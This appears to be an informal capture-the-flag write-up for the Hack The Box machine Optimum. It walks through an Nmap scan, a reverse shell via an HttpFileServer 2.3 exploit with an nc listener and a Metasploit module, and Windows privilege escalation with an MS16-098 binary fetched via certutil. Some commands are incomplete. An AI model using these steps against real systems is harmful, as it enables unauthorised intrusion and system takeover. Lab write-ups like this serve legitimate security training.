Nmap scan

80/tcp open http HttpFileServer httpd 2.3
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|7|Vista|2008 (91%)

Here we got see that there is only http port if open

Movin ahead to http we got to see that HTTP server 2.3 is running on it

After this i enumerated the whole page but didn’t find any useful hint to move in after searching for server version vulnerability i got form github here it this python exploit gives a reverse shell we just have to change our below things in script

ip_addr = YOUR IPlocal_port = YOUR PORT  NOTE :- change this in the python script ( for getting shell

After that we run the our nc on selected port and got reverse shell of kostas user

{ NOTE : you migth not get reverse shell so quickly you have to run script move then often for getting a reverse shell otherwise use msfconsole for getting reverse shell use “ exploit/windows/http/rejetto_hfs_exec , set payload windows/meterpreter/reverse_tcp “ and enter your rhost,rport,lhost,lport then run it } after getting meterpreter shell run shell command for getting a window shell 

After getting shell you will get to see that you a kostas user by using whoami command move to C:\Users\kostas\Desktop you will get user.txt.txt run type user.txt.txt to see the user hash

POST EXPLOITATION {Administrator power }

Run systeminfo

Copy this systeminfo and paste it in a file at your local-pc named (systeminfo) then run below command for checking the vulnerability for exploiting it

./ -d 2019–09–18-mssb.xls -i /root/predator/oscp/htb/optimum/systeminfo1. ./ --update 
this will give you a latest file of expolits
2../ --database 2019–09–18-mssb.xls --systeminfo systeminfo2019-09-08-mssb.xls - file you get after update command
systeminfo - file in which you had copied windows output of systeminfo command

This python script is used for getting vulnerability in windows machine so that we can exploit it for privilege escalation

Here you will get various vulnerability for exploiting machine but there are some which indicates to privilege escalation

On looking for exploits i got MS16–098 to be useful after searching for while i got to see a github repository having .exe file which can be useful because we don’t have to compile it

There i got bfill.exe file now the main way i to transfer this file to our target windows machine

I used below command for transferring the file to window machine

python -m SimpleHTTPServer 80on my local pc having bfill.exe

Then used

certutil -urlcache -f raj.exeon windows machine 

So here we got our exploit to machine

Now we just have to run the exploit

Here we access to system access now we are having all the permissions to move in machine

And here we got the root.txt

{ satisfaction }


Security Researcher, Penetration Tester